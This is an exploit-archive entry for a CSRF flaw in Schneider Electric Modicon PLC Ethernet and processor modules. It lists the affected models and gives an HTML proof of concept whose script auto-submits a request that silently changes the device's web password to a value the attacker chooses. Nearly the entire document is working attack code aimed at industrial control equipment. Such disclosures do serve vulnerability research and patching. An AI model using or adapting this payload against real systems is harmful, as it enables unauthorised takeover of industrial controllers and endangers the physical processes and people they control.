# Exploit Title: Schneider Electric/Modicon PLC - CSRF Vulnerability
# Date: 2018-05-18
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.schneider-electric.com/
# Version: BMXNOC0401, BMXNOE0100, BMXNOE0110, BMXNOE0110H, BMXNOR0200H, BMXP342020, BMXP342020H, BMXP342030, BMXP3420302, BMXP3420302H, and BMXP342030H.
# Tested on: Windows 8 OS and Chrome Explorer
# Greetz: Jameel Nabbo
# PoC
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://TargetAdress/secure/embedded/builtin?Language=undefined&user=USERNAME&passwd=PASSWORD&cnfpasswd=PASSWORD&subhttppwd=Change+Password"
method="get">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>